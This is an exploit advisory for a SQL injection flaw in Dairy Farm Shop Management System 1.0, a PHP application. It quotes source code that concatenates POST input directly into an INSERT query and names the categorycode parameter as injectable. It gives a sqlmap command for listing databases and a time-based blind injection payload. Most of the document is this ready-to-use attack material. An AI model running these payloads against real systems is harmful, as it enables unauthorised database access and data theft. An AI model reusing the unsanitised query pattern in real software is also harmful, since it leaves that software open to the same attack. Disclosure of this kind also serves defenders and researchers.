# Exploit Title: Dairy Farm Shop Management System 1.0 - SQL Injection # Date: 2020-07-23 # Exploit Author: Mehmet Ayberk Annadınc # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Microsoft Windows, Kali Linux Source Code (add-category.php): $catname=$_POST['category']; $catcode=$_POST['categorycode']; $query=mysqli_query($con,"insert into tblcategory(CategoryName,CategoryCode) values('$catname','$catcode')"); if($query){ echo "<script>alert('Category added successfully.');</script>"; echo "<script>window.location.href='add-category.php'</script>"; } else{ echo "<script>alert('Something went wrong. Please try again.');</script>"; echo "<script>window.location.href='add-category.php'</script>"; } } PoC: categorycode parameter is affected. SQLMap parameters is: sqlmap -r sq1 --dbms=mysql -v 3 --dbs and the payload is: 1' AND 6539=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),15,1))>1),SLEEP(1),6539) AND 'bRmM'='bRmM.